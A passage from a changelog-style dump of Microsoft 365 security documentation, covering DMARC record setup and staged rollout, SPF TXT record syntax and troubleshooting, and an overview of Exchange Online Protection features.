--- **Percentage of failed DMARC mail subject to DMARC policy**: Tells the destination email system how many messages that fail DMARC (percentage) get the DMARC policy applied to them. For example, `pct=100` means all messages that fail DMARC get the DMARC policy applied to them. You use values less than 100 for [testing and tuning of the DMARC policy](#set-up-dmarc-for-active-custom-domains-in-microsoft-365) as described later in this article. If you don't use `pct=`, the default value is `pct=100`.--- **DMARC reports**:
- - **DMARC Aggregate report URI**: The `rua=mailto:` value identifies where to send the DMARC Aggregate report. The Aggregate report has the following properties:
- - The email messages that contain the Aggregate report are typically sent once per day (the report contains the DMARC results from the previous day). The Subject line contains the destination domain that sent the report (Submitter) and the source domain for the DMARC results (Report Domain).
- - The DMARC data is in an XML email attachment that's likely GZIP compressed. The XML schema is defined in [Appendix C of RFC 7489](https://datatracker.ietf.org/doc/html/rfc7489#appendix-C). The report contains the following information:
- - The IP addresses of servers or services that send mail using your domain.
- - Whether the servers or services pass or fail DMARC authentication.
- - The actions that DMARC takes on mail that fails DMARC authentication (based on the DMARC policy).
-
- > [!TIP]
- > The information in the Aggregate report can be vast and difficult to parse. To help make sense of the data, you can use the following options for DMARC reporting:
- >
- > - Create automation using PowerShell or Microsoft Power BI.
- > - Use an external service. For a list of services, search for DMARC in the Microsoft Intelligent Security Association (MISA) Catalog at <https://www.microsoft.com/misapartnercatalog>. The DMARC reporting services describe any custom values that are required in the DMARC TXT record.
-
- - **DMARC Forensic report URI**: The `ruf=mailto:` value identifies where to send the DMARC Forensic report (also known as the DMARC Failure report). The report is generated and sent immediately after a DMARC failure like a non-delivery report (also known as an NDR or bounce message).
-
- > [!TIP]
- > You should regularly review the DMARC Aggregate reports to monitor where email from your domains is coming from, and to check for unintentional DMARC failures (false positives).
- >
- > Individual destination email systems are responsible for sending DMARC reports back to you. The amount and variety of DMARC reports varies in the same way that the volume and variety of mail sent from your organization varies. For example, expect lower mail volume during holidays, and higher mail volume during organizational events. It's best to designate specific people to monitor DMARC reports, and to use a specific mailbox or Microsoft 365 Group to receive the DMARC reports (don't deliver the reports to a user's mailbox).
-
-For more information about DMARC, use the following resources:
--- The [DMARC Training Series](https://www.m3aawg.org/activities/training/dmarc-training-series) from M<sup>3</sup>AAWG (Messaging, Malware, Mobile Anti-Abuse Working Group).-- The checklist at [dmarcian](https://space.dmarcian.com/deployment/).-- Information at [DMARC.org](https://dmarc.org).-
-## Use the Microsoft 365 admin center to add DMARC TXT records for \*.onmicrosoft.com domains in Microsoft 365
-
-1. In the Microsoft 365 admin center at <https://admin.microsoft.com>, select **Show all** \> **Settings** \> **Domains**. Or, to go directly to the **Domains** page, use <https://admin.microsoft.com/Adminportal/Home#/Domains>.
-
-2. On the **Domains** page, select the \*.onmicrosoft.com domain from the list by clicking anywhere in the row other than the check box next to the domain name.
-
-3. On the domain details page that opens, select the **DNS records** tab.
-
-4. On the **DNS records** tab, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add record**.
-
-5. On the **Add a custom DNS record** flyout that opens, configure the following settings:
- - **Type**: Verify that **TXT (Text)** is selected.
- - **TXT name**: Enter `_dmarc`.
- - **TXT value**: Enter `v=DMARC1; p=reject`.
-
- > [!TIP]
- > To specify destinations for the DMARC Aggregate and DMARC Forensic reports, use the syntax `v=DMARC1; p=reject rua=mailto:<emailaddress>; ruf=mailto:<emailaddress>`. For example, `v=DMARC1; p=reject rua=mailto:rua@contoso.onmicrosoft.com; ruf=mailto:ruf@contoso.onmicrosoft.com`.
- >
- > DMARC reporting vendors in the MISA Catalog at <https://www.microsoft.com/misapartnercatalog> make it easier to view and interpret DMARC results.
-
- - **TTL**: Verify that **1 hour** is selected.
-
- When you're finished on the **Add a custom DNS record** flyout, select **Save**.
-
-## Set up DMARC for active custom domains in Microsoft 365
-
-> [!TIP]
-> As mentioned previously in this article, you need to [create SPF TXT records](email-authentication-spf-configure.md#spf-txt-records-for-custom-domains-in-microsoft-365) and [configure DKIM signing](email-authentication-dkim-configure.md#use-the-defender-portal-to-enable-dkim-signing-of-outbound-messages-using-a-custom-domain) for all custom domains and subdomains that you use to send email in Microsoft 365 _before_ you configure DMARC for custom domains or subdomains.
-
-We recommend a gradual approach to setting up DMARC for your Microsoft 365 domains. The goal is to get to a `p=reject` DMARC policy for all of your custom domains and subdomains, but you need to test and verify along the way to prevent destination email systems from rejecting good mail because of unintentional DMARC failures.
-
-Your DMARC roll-out plan should use the following steps. Start with a domain or subdomain with low mail volume and/or fewer potential email sources (less chance of legitimate mail from unknown sources being blocked):
-
-1. Start with a DMARC policy of `p=none` and monitor the results for the domain. For example:
-
- **DMARC TXT record for marketing.contoso.com**:
-
- **Hostname**: `_dmarc`<br/>
- **TXT value**: `v=DMARC1; p=none; pct=100; rua=mailto:rua@marketing.contoso.com; ruf=mailto:ruf@marketing.contoso.com`
-
- The DMARC Aggregate and DMARC Forensic reports give the numbers and sources of messages that pass and fail DMARC checks. You can see how much of your legitimate mail traffic is or isn't covered by DMARC, and troubleshoot any problems. You can also see how many fraudulent messages are being sent, and where they're sent from.
-
-2. Increase the DMARC policy to `p=quarantine` and monitor the results for the domain.
-
- After enough time monitoring the effects of `p=none`, you can increase the DMARC policy to `p=quarantine` for the domain. For example:
-
- **DMARC TXT record for marketing.contoso.com**:
-
- **Hostname**: `_dmarc`<br/>
- **TXT value**: `v=DMARC1; p=quarantine; pct=100; rua=mailto:rua@marketing.contoso.com; ruf=mailto:ruf@marketing.contoso.com`
-
- You can also use the `pct=` value to gradually affect more messages and verify the results. For example, you can move in the following increments:
-
- - `pct=10`
- - `pct=25`
- - `pct=50`
- - `pct=75`
- - `pct=100`
-
-3. Increase the DMARC policy to `p=reject` and monitor the results for the domain.
-
- After enough time monitoring the effects of `p=quarantine`, you can increase the DMARC policy to `p=reject` for the domain. For example:
-
- **DMARC TXT record for marketing.contoso.com**:
-
- **Hostname**: `_dmarc`<br/>
- **TXT value**: `v=DMARC1; p=reject; pct=100; rua=mailto:rua@marketing.contoso.com; ruf=mailto:ruf@marketing.contoso.com`
-
- You can also use the `pct=` value to gradually affect more messages and verify the results.
-
-4. Repeat the previous three steps for the remaining subdomains of increasing volume and/or complexity, saving the parent domain for last.
-
- > [!TIP]
- > Blocking legitimate email in any significant volume is unacceptable to users, but it's almost inevitable that you're going to get some false positives. Go slowly and methodically deal with issues that are revealed in DMARC reporting. DMARC reporting vendors in the MISA Catalog at <https://www.microsoft.com/misapartnercatalog> make it easier to view and interpret the DMARC results.
-
-5. As described earlier, subdomains inherit the DMARC TXT record settings of the parent domain, which can be overridden by a separate DMARC TXT record in the subdomain. When you're finished setting up DMARC in a domain and all subdomains, and the DMARC settings are effectively identical for the parent domain and all subdomains, you can eliminate the DMARC TXT records in the subdomains and rely on the single DMARC TXT record in the parent domain.
-
-## DMARC TXT records for parked domains in Microsoft 365
-
-> [!TIP]
-> The recommended SPF TXT record for parked domains that don't send mail is described in [SPF TXT records for custom domains in Microsoft 365](email-authentication-spf-configure.md#spf-txt-records-for-custom-domains-in-microsoft-365). As described in [Set up DKIM to sign mail from your Microsoft 365 domain](email-authentication-dkim-configure.md), we don't recommend DKIM CNAME records for parked domains.
-
-1. If you have registered domains that no one on the internet should expect to receive mail from, create the following DMARC TXT record at the domain registrar for the domain:
-
- **Hostname**: `_dmarc`<br/>
- **TXT value**: `v=DMARC1; p=reject;`
-
- - The `pct=` value isn't included, because the default value is `pct=100`.
- - The `rua=mailto:` and `ruf=mailto:` values are arguably not needed in this scenario, because no valid mail should ever come from senders in the domain.
-
-2. If you don't use the \*.onmicrosoft.com domain to send mail, you also need to [add the DMARC TXT record for your \*.onmicrosoft.com domain](#use-the-microsoft-365-admin-center-to-add-dmarc-txt-records-for-onmicrosoftcom-domains-in-microsoft-365).
-
-## DMARC for inbound mail into Microsoft 365
--- DMARC checks on mail coming into Microsoft 365 are affected by the following features in Exchange Online Protection (EOP):
- - Whether [spoof intelligence](anti-phishing-policies-about.md#spoof-settings) is enabled or disabled in the anti-phishing policy that checked the message. Disabling spoof intelligence disables _implicit_ spoofing protection from [composite authentication](email-authentication-about.md#composite-authentication) checks only.
- - Whether the **Honor DMARC record policy when the message is detected as spoof** setting is enabled or disabled in the anti-phishing policy that checked the message, and the specified actions based on the DMARC policy of the source domain (`p=quarantine`, or `p=reject` in the DMARC TXT record).
-
- For complete information, see [Spoof protection and sender DMARC policies](anti-phishing-policies-about.md#spoof-protection-and-sender-dmarc-policies).
-
- To see the default values for these settings in anti-phishing policies, check the setting values in the table at [EOP anti-phishing policy settings](recommended-settings-for-eop-and-office365.md#eop-anti-phishing-policy-settings).
--- Microsoft 365 doesn't send DMARC Forensic reports (also known as DMARC Failure reports), even if a valid `ruf=mailto:` address exists in the DMARC TXT record of the source domain.--- Microsoft 365 sends DMARC Aggregate reports to all domains with a valid `rua=mailto:` address in the DMARC TXT records, as long as the MX record for the Microsoft 365 domain points directly to Microsoft 365.-
- If mail from the internet is routed through a third-party service or device before delivery to Microsoft 365 (the MX record points somewhere other than Microsoft 365), DMARC Aggregate reports aren't sent. This limitation includes hybrid or standalone EOP scenarios where mail is delivered to the on-premises environment before being routed to Microsoft 365 using a connector.
-
- > [!TIP]
- > When a third-party service or device sits in front of mail flowing into Microsoft 365, [Enhanced Filtering for Connectors](/exchange/mail-flow-best-practices/use-connectors-to-configure-mail-flow/enhanced-filtering-for-connectors) (also known as _skip listing_) correctly identifies the source of internet messages for SPF, DKIM (if the service modifies messages), and DMARC validation.
-
-## Troubleshooting DMARC
-
-You can use the following graphic to help troubleshoot DMARC authentication issues.
--
-## Next steps
-
-For mail coming _into_ Microsoft 365, you might also need to configure trusted ARC sealers if you use services that modify messages in transit before delivery to your organization. For more information, see [Configure trusted ARC sealers](email-authentication-arc-configure.md).
security Email Authentication Spf Configure https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/email-authentication-spf-configure.md
- Title: Set up SPF identify valid email sources for your Microsoft 365 domain
- - CSH
--- Previously updated : 1/29/2024--
- - MET150
-
- - m365-security
- - tier2
-
- - seo-marvel-apr2020
-description: Learn how to update a Domain Name Service (DNS) record to use Sender Policy Framework (SPF) with your custom domain in Office 365.
-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Set up SPF to identify valid email sources for your Microsoft 365 domain
--
-Sender Policy Framework (SPF) is a method of [email authentication](email-authentication-about.md) that helps validate mail sent from your Microsoft 365 organization to prevent spoofed senders that are used in business email compromise (BEC), ransomware, and other phishing attacks.
-
-The primary purpose of SPF is to validate email sources for a domain. Specifically, SPF uses a TXT record in DNS to identify valid sources of mail for the domain. Receiving email systems use the SPF TXT record to verify that email from the sender address used during the SMTP transmission of the message (known as the MAIL FROM address, `5321.MailFrom` address, P1 sender, or envelope sender) is from a known, designated source of mail for that domain.
-
-For example, if your email domain in Microsoft 365 is contoso.com, you create an SPF TXT record in DNS for the contoso.com domain to identify Microsoft 365 as an authorized source of mail from contoso.com. Destination email systems check the SPF TXT record in contoso.com to determine whether the message came from an authorized source for contoso.com email.
-
-Before we get started, here's what you need to know about SPF in Microsoft 365 based on your email domain:
--- **If you use only the Microsoft Online Email Routing Address (MOERA) domain for email (for example, contoso.onmicrosoft.com)**: You don't need to do anything. The SPF TXT record is already configured for you. Microsoft owns the onmicrosoft.com domain, so we're responsible for creating and maintaining the DNS records in that domain and subdomains. For more information about \*.onmicrosoft.com domains, see [Why do I have an "onmicrosoft.com" domain?](/microsoft-365/admin/setup/domains-faq#why-do-i-have-an--onmicrosoft-com--domain).--- **If you use one or more custom domains for email (for example, contoso.com)**: The Microsoft 365 enrollment process already required you to create or modify the SPF TXT record in DNS for your custom domain to identify Microsoft 365 as an authorized mail source. But, you still have more work to do for maximum email protection:
- - **Subdomain considerations**:
- - For email services that aren't under your direct control (for example, bulk email services), we recommend using a subdomain (for example, marketing.contoso.com) instead of your main email domain (for example, contoso.com). You don't want issues with mail sent from those email services to affect the reputation of mail sent by employees in your main email domain. For more information about adding subdomains, see [Can I add custom subdomains or multiple domains to Microsoft 365?](/microsoft-365/admin/setup/domains-faq#can-i-add-custom-subdomains-or-multiple-domains-to-microsoft-365).
- - Each subdomain that you use to send email from Microsoft 365 requires its own SPF TXT record. For example, the SPF TXT record for contoso.com doesn't cover marketing.contoso.com; marketing.contoso.com needs its own SPF TXT record.
-
- > [!TIP]
- > Email authentication protection for _undefined_ subdomains is covered by DMARC. Any subdomains (defined or not) inherit the DMARC settings of the parent domain (which can be overridden per subdomain). For more information, see [Set up DMARC to validate the From address domain for senders in Microsoft 365](email-authentication-dmarc-configure.md).
-
- - **If you own registered but unused domains**: If you own registered domains that aren't used for email or anything at all (also known as _parked domains_), configure SPF TXT records to indicate that no email should ever come from those domains as described later in this article.
--- **SPF alone is not enough**. For the best level of email protection for your custom domains, you also need to configure DKIM and DMARC as part of your overall [email authentication](email-authentication-about.md) strategy. For more information, see the [Next Steps](#next-steps) section at the end of this article.-
- > [!IMPORTANT]
- > In complex organizations where it's difficult to identify all valid sources of mail for the domain, it's important that you quickly configure DKIM signing and DMARC (in 'take no action' mode) for the domain. A DMARC reporting service is very helpful for identifying email sources and SPF failures for the domain.
-
-The rest of this article describes the SPF TXT records that you need to create for custom domains in Microsoft 365.
-
-> [!TIP]
-> There are no admin portals or PowerShell cmdlets in Microsoft 365 for you to manage SPF records in your domain. Instead, you create the SPF TXT record at your domain registrar or DNS hosting service (often the same company).
->
-> We provide instructions to create the proof of domain ownership TXT record for Microsoft 365 at many domain registrars. You can use these instructions as a starting point to create the SPF TXT record value. For more information, see [Add DNS records to connect your domain](../../admin/get-help-with-domains/create-dns-records-at-any-dns-hosting-provider.md).
->
-> If you're unfamiliar with DNS configuration, contact your domain registrar and ask for help.
-
-## Syntax for SPF TXT records
-
-SPF TXT records are exhaustively described in [RFC 7208](https://datatracker.ietf.org/doc/html/rfc7208).
-
-The basic syntax of the SPF TX record for a custom domain in Microsoft 365 is:
-
-```txt
-v=spf1 <valid mail sources> <enforcement rule>
-```
-
-Or:
-
-```text
-v=spf1 [<ip4>|<ip6>:<PublicIPAddress1> <ip4>|<ip6>:<PublicIPAddress2>... <ip4>|<ip6>:<PublicIPAddressN>] [include:<DomainName1> include:<DomainName1>... include:<DomainNameN>] <-all | ~all>
-```
-
-For example:
-
-```text
-v=spf1 ip4:192.168.0.10 ip4:192.168.0.12 include:spf.protection.outlook.com -all
-```
--- `v=spf1` identifies the TXT record as an SPF TXT record.--- **Valid mail sources**: Specified valid sources of mail for the domain. Uses **Domains**, **IP addresses**, or both:
- - **Domains**: `include:` values specify other services or domains as valid sources of mail from the original domain. These values ultimately lead to an IP address using DNS lookups.
-
- Most Microsoft 365 organizations require `include:spf.protection.outlook.com` in the SPF TXT record for the domain. Other third-party email services often require an additional `include:` value to identify the service as a valid source of email from the original domain.
-
- - **IP addresses**: An IP address value includes both of the following elements:
- - The value `ip4:` or `ip6:` to identify the type of IP address.
- - The publicly resolvable IP address of the source email system. For example:
- - An individual IP address (for example, 192.168.0.10).
- - An IP address range using Classless Inter-Domain Routing (CIDR) notation (for example 192.168.0.1/26). Be sure that the range isn't too big or too small.
-
- In Microsoft 365, you typically use IP addresses in the SPF TXT record only if you have on-premises email servers that send mail from the Microsoft 365 domain (for example, [Exchange Server hybrid deployments](/exchange/exchange-hybrid)). Some third-party email services might also use an IP address range instead of an `include:` value in the SPF TXT record.
--- **Enforcement rule**: Tells destination email systems what to do with messages from sources that aren't specified in the SPF TXT record for the domain. Valid values are:
- - `-all` (hard fail): Sources not specified in the SPF TXT record aren't authorized to send mail for the domain, so the messages should be rejected. What actually happens to the message depends on the destination email system, but the messages are typically discarded.
-
- For Microsoft 365 domains, we recommend `-all` (hard fail) because we also recommend DKIM and DMARC for the domain. The DMARC policy specifies what to do to messages that fail SPF or DKIM, and DMARC reports allow you to validate the results.
-
- > [!TIP]
- > As previously indicated, DMARC configured with a DMARC reporting service helps greatly in identifying email sources and SPF failures for the domain.
-
- - `~all` (soft fail): Sources not specified in the SPF TXT record _probably_ aren't authorized to send mail for the domain, so the messages should be accepted but marked. What actually happens to the message depends on the destination email system. For example, the message might be quarantined as spam, delivered to the Junk Email folder, or delivered to the Inbox with an identifier added to the Subject or message body.
-
- Because we also recommend DKIM and DMARC for Microsoft 365 domains, the differences between `-all` (hard fail) and `~all` (soft fail) are effectively eliminated (DMARC treats either result as an SPF failure). DMARC uses SPF to confirm the domains in the MAIL FROM and From addresses align _and_ the message came from a valid source for the From domain.
-
- > [!TIP]
- > `?all` (neutral) is also available to suggest no specific action on messages from unidentified sources. This value is used for testing, and we don't recommend this value in production environments.
-
-Important points to remember:
--- Each defined domain or subdomain in DNS requires an SPF TXT record, and only one SPF record is allowed per domain or subdomain. Email authentication protection for _undefined_ subdomains is best handled by DMARC.-- You can't modify the existing SPF TXT record for the \*.onmicrosoft.com domain.-- When the destination email system checks the valid email sources in the SPF record, SPF validation fails if the check requires too many DNS lookups. For more information, see the [Troubleshooting SPF TXT records](#troubleshooting-spf-txt-records) section later in this article.-
-## SPF TXT records for custom domains in Microsoft 365
-
-> [!TIP]
-> As previously mentioned in this article, you create the SPF TXT record for a domain or subdomain at the domain registrar for the domain. No SPF TXT record configuration is available in Microsoft 365.
--- **Scenario**: You use contoso.com for email in Microsoft 365, and Microsoft 365 is the only source of email from contoso.com.-
- **SPF TXT record for contoso.com in Microsoft 365 and Microsoft 365 Government Community Cloud (GCC)**:
-
- ```text
- v=spf1 include:spf.protection.outlook.com -all
- ```
-
- **SPF TXT record for contoso.com in Microsoft 365 Government Community Cloud High (GCC High) and Microsoft 365 Department of Defense (DoD)**:
-
- ```text
- v=spf1 include:spf.protection.office365.us -all
- ```
-
- **SPF TXT record for contoso.com in Microsoft 365 operated by 21Vianet**
-
- ```text
- v=spf1 include:spf.protection.partner.outlook.cn -all
- ```
--- **Scenario**: You use contoso.com for email in Microsoft 365, and you already configured the SPF TXT record in contoso.com with all sources of email from the domain. You also own the domains contoso.net and contoso.org, but you don't use them for email. You want to specify that no one is authorized to send email from contoso.net or contoso.org.-
- **SPF TXT record for contoso.net**:
-
- ```txt
- v=spf1 -all
- ```
-
- **SPF TXT record for contoso.org**:
-
- ```txt
- v=spf1 -all
- ```
--- **Scenario**: You use contoso.com for email in Microsoft 365. You plan on sending mail from the following sources:
- - An on-premises email server with the external email address of 192.168.0.10. Because you have direct control over this email source, we consider it OK to use the server for senders in the contoso.com domain.
- - The Adatum bulk mailing service. Because you don't have direct control over this email source, we recommend using a subdomain, so you create marketing.contoso.com for that purpose. According to the Adatum service documentation, you need to add `include:servers.adatum.com` to the SPF TXT record for your domain.
-
- **SPF TXT record for contoso.com**:
-
- ```text
- v=spf1 ip4:192.168.0.10 include:spf.protection.outlook.com -all
- ```
-
- **SPF TXT record for marketing.contoso.com**:
-
- ```text
- v=spf1 include:servers.adatum.com include:spf.protection.outlook.com -all
- ```
-
-## Troubleshooting SPF TXT records
--- **One SPF record per domain or subdomain**: Multiple SPF TXT records for the same domain or subdomain cause a DNS lookup loop that makes SPF fail, so use only one SPF record per domain or subdomain.--- **Less than 10 DNS lookups**: When destination email systems query the SPF TXT record for valid sources for the MAIL FROM address domain, the query scans through the IP addresses and `include:` statements in the record until the message source (ultimately, an IP address) matches one of the specified sources. If the number of DNS lookups (which can be different than the number of DNS _queries_) is greater than 10, the message fails SPF with a permanent error (also known as a `permerror`). The destination email system rejects the message in a non-delivery report (also known as an NDR or _bounce message_) with one of the following errors:
- - The message exceeded the hop count.
- - The message required too many lookups.
-
- In the SPF TXT record, individual IP addresses or IP address ranges don't cause DNS lookups. Each `include:` statement requires at least one DNS lookup, and more lookups might be required if the `include:` value points to nested resources. In other words, having less than 10 `include:` statements doesn't guarantee less than 10 DNS lookups.
-
- Also keep in mind: destination email systems evaluate the sources in the SPF TXT record from left to right. Evaluation stops when the message source is validated, and no more sources are checked. Therefore, an SPF TXT record might contain enough information to cause more than 10 DNS lookups, but the validation of some mail sources by some destinations doesn't go deep enough in the record to result in an error.
-
- In addition to preserving the reputation of your main email domain, not exceeding the number of DNS lookups is another reason to use subdomains for other email services that you don't control.
-
-You can use free online tools to view your SPF TXT record and other DNS records for your domain. Some tools even calculate the number of DNS record lookups that your SPF TXT record requires.
-
-## Next Steps
-
-As described in [How SPF, DKIM, and DMARC work together to authenticate email message senders](email-authentication-about.md#how-spf-dkim-and-dmarc-work-together-to-authenticate-email-message-senders), SPF alone isn't enough to prevent spoofing of your Microsoft 365 domain. You also need to configure DKIM and DMARC for the best possible protection. For instructions, see:
--- [Use DKIM to validate outbound email sent from your custom domain](email-authentication-dkim-configure.md)-- [Use DMARC to validate email](email-authentication-dmarc-configure.md)-
-For mail coming _into_ Microsoft 365, you might also need to configure trusted ARC sealers if you use services that modify messages in transit before delivery to your organization. For more information, see [Configure trusted ARC sealers](email-authentication-arc-configure.md).
security Eop About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/eop-about.md
- Title: Exchange Online Protection (EOP) overview
- - NOCSH
--- Previously updated : 10/3/2023--
- - m365-security
- - tier2
-
- - seo-marvel-apr2020
-description: Learn how Exchange Online Protection (EOP) can help protect your on-premises email organization in standalone and hybrid environments.
-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Exchange Online Protection overview
--
-Exchange Online Protection (EOP) is the cloud-based filtering service that protects your organization against spam, malware, phishing and other email threats. EOP is included in all Microsoft 365 organizations that have Exchange Online mailboxes.
-
-> [!TIP]
-> EOP is also available by itself to protect on-premises mailboxes and in hybrid environments to protect on-premises Exchange mailboxes. For more information, see [Standalone Exchange Online Protection](/exchange/standalone-eop/standalone-eop).
-
-You can sign up for an EOP trial and get pricing information at the [Exchange Online Protection home page](https://products.office.com/exchange/exchange-email-security-spam-protection).
-
-EOP protection is on by default thanks to the default policies for:
--- [Anti-malware protection](anti-malware-protection-about.md)-- [Anti-spam protection](anti-spam-protection-about.md)-- [Anti-phishing (spoof) protection](anti-phishing-protection-about.md#anti-phishing-protection-in-eop)-
-These default policies apply to all recipients by default and can't be turned off, but they can be overridden by [preset security policies](preset-security-policies.md) or custom policies that you create.
-
-You can customize the security settings in the default policies, create custom policies, or better yet, turn on and add all recipients to the Standard and/or Strict preset security policies. For complete information, see [Configure protection policies](mdo-deployment-guide.md#step-2-configure-protection-policies).
-
-The rest of this article explains how EOP works and the features that are available in EOP.
-
-## How EOP works
-
-To understand how EOP works, it helps to see how it processes incoming email:
--
-1. When an incoming message enters EOP, it initially passes through connection filtering, which checks the sender's reputation. Most spam is stopped at this point and rejected by EOP. For more information, see [Configure connection filtering](connection-filter-policies-configure.md).
-
-2. Then the message is inspected for malware. If malware is found in the message or a message attachment, the message is delivered to quarantine. By default, only admins can view and interact with malware quarantined messages. But, admins can create and use [quarantine policies](quarantine-policies.md#anatomy-of-a-quarantine-policy) to specify what users are allowed to do to quarantined messages. To learn more about malware protection, see [Anti-malware protection in EOP](anti-malware-protection-about.md).
-
-3. The message continues through policy filtering, where it's evaluated against any mail flow rules (also known as transport rules) that you've created. For example, a rule can send a notification to a manager when a message arrives from a specific sender.
-
- In on-premises organization with Exchange Enterprise CAL with Services licenses, [Microsoft Purview Data Loss Prevention (DLP)](/exchange/security-and-compliance/data-loss-prevention/data-loss-prevention) checks in EOP also happen at this point.
-
-4. The message passes through content filtering (anti-spam and anti-spoofing) where harmful messages are identified as spam, high confidence spam, phishing, high confidence phishing, or bulk (anti-spam policies) or spoofing (spoof settings in anti-phishing policies). You can configure the action to take on the message based on the filtering verdict (quarantine, move to the Junk Email folder, etc.), and what users can do to the quarantined messages using [quarantine policies](quarantine-policies.md#anatomy-of-a-quarantine-policy). For more information, see [Configure anti-spam policies](anti-spam-policies-configure.md) and [Configure anti-phishing policies in EOP](anti-phishing-policies-eop-configure.md).
-
-A message that successfully passes all of these protection layers is delivered to the recipients.
-
-For more information, see [Order and precedence of email protection](how-policies-and-protections-are-combined.md).
-
-### EOP datacenters
-
-EOP runs on a worldwide network of datacenters that are designed to provide the best availability. For example, if a datacenter becomes unavailable, email messages are automatically routed to another datacenter without any interruption in service. Servers in each datacenter accept messages on your behalf, providing a layer of separation between your organization and the internet, thereby reducing load on your servers. Through this highly available network, Microsoft can ensure that email reaches your organization in a timely manner.
-
-EOP performs load balancing between datacenters but only within a region. If you're provisioned in one region, all of your messages are processed using the mail routing for that region.
-
-### EOP communications
-
-The following communication channels are available for issues and new features in EOP:
--- If you're affected by a Service Level Event, you should see a communication alert (typically accompanied by a bell icon) in the Microsoft 365 admin center at <https://admin.microsoft.com>. We recommend that you read and act on any items as appropriate.-- The Microsoft 365 Message center at <https://admin.microsoft.com/Adminportal/Home?#/MessageCenter> also contains information about new and updated features. For more information, see [Track new and changed features in the Microsoft 365 Message center](/microsoft-365/admin/manage/message-center).-- The [Microsoft 365 for business roadmap](https://www.microsoft.com/microsoft-365/roadmap?filters=O365) is a good resource for finding out information about upcoming new features.-- We also posting blog articles about new features to the [Microsoft 365 Blogs](https://www.microsoft.com/microsoft-365/blog/) website.-
-### EOP features
-
-This section provides a high-level overview of the main features that are available in EOP.
-
-For information about requirements, important limits, and feature availability across all EOP subscription plans, see the [Exchange Online Protection service description](/office365/servicedescriptions/exchange-online-protection-service-description/exchange-online-protection-service-description).
-
-**Notes**:
--- EOP uses several URL block lists that help detect known malicious links within messages.-- EOP uses a vast list of domains that are known to send spam.-- EOP uses multiple anti-malware engines help to automatically protect our customers.-- EOP inspects the active payload in the message body and all message attachments for malware.-
-|Feature|Comments|
-|||
-|**Protection**||
-|Preset security policies|[Preset security policies in EOP and Microsoft Defender for Office 365](preset-security-policies.md) <p> [Configuration analyzer for protection policies in EOP and Microsoft Defender for Office 365](configuration-analyzer-for-security-policies.md)|
-|Anti-malware|[Anti-malware protection in EOP](anti-malware-protection-about.md) <p> [Anti-malware protection FAQ](anti-malware-protection-faq.yml) <p> [Configure anti-malware policies in EOP](anti-malware-policies-configure.md)|
-|Inbound anti-spam|[Anti-spam protection in EOP](anti-spam-protection-about.md) <p> [Anti-spam protection FAQ](anti-spam-protection-faq.yml) <p> [Configure anti-spam policies in EOP](anti-spam-policies-configure.md)|
-|Outbound anti-spam|[Outbound spam protection in EOP](outbound-spam-protection-about.md) <p> [Configure outbound spam filtering in EOP](outbound-spam-policies-configure.md) <p> [Control automatic external email forwarding in Microsoft 365](outbound-spam-policies-external-email-forwarding.md)|
-|Connection filtering|[Configure connection filtering](connection-filter-policies-configure.md)|
-|Anti-phishing|[Anti-phishing policies in Microsoft 365](anti-phishing-policies-about.md) <p> [Configure anti-phishing policies in EOP](anti-phishing-policies-eop-configure.md)|
-|Anti-spoofing protection|[Spoof intelligence insight in EOP](anti-spoofing-spoof-intelligence.md) <p> [Manage the Tenant Allow/Block List](tenant-allow-block-list-about.md)|
-|Zero-hour auto purge (ZAP) for delivered malware, spam, and phishing messages|[ZAP in Exchange Online](zero-hour-auto-purge.md)|
-|Tenant Allow/Block List|[Manage the Tenant Allow/Block List](tenant-allow-block-list-about.md)|
-|Block lists for message senders|[Create blocked sender lists in EOP](create-block-sender-lists-in-office-365.md)|
-|Allow lists for message senders|[Create safe sender lists in EOP](create-safe-sender-lists-in-office-365.md)|
-|Directory Based Edge Blocking (DBEB)|[Use Directory Based Edge Blocking to reject messages sent to invalid recipients](/exchange/mail-flow-best-practices/use-directory-based-edge-blocking)|
-|**Quarantine and submissions**||
-|Admin submission|[Use Admin submission to submit suspected spam, phish, URLs, and files to Microsoft](submissions-admin.md)|
-|User reported message settings|[User reported settings](submissions-user-reported-messages-custom-mailbox.md)|
-|Quarantine - admins|[Manage quarantined messages and files as an admin in EOP](quarantine-admin-manage-messages-files.md) <p> [Quarantined messages FAQ](quarantine-faq.yml) <p> [Report messages and files to Microsoft](submissions-report-messages-files-to-microsoft.md) <p> [Anti-spam message headers in Microsoft 365](message-headers-eop-mdo.md) <p> You can analyze the message headers of quarantined messages using the [Message Header Analyzer at](https://mha.azurewebsites.net/).|
-|Quarantine - end-users|[Find and release quarantined messages as a user in EOP](quarantine-end-user.md) <p> [Use quarantine notifications to release and report quarantined messages](quarantine-quarantine-notifications.md) <p> [Quarantine policies](quarantine-policies.md)|
-|**Mail flow**||
-|Mail flow rules|[Mail flow rules (transport rules) in Exchange Online](/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules) <p> [Mail flow rule conditions and exceptions (predicates) in Exchange Online](/exchange/security-and-compliance/mail-flow-rules/conditions-and-exceptions) <p> [Mail flow rule actions in Exchange Online](/exchange/security-and-compliance/mail-flow-rules/mail-flow-rule-actions) <p> [Manage mail flow rules in Exchange Online](/exchange/security-and-compliance/mail-flow-rules/manage-mail-flow-rules) <p> [Mail flow rule procedures in Exchange Online](/exchange/security-and-compliance/mail-flow-rules/mail-flow-rule-procedures)|
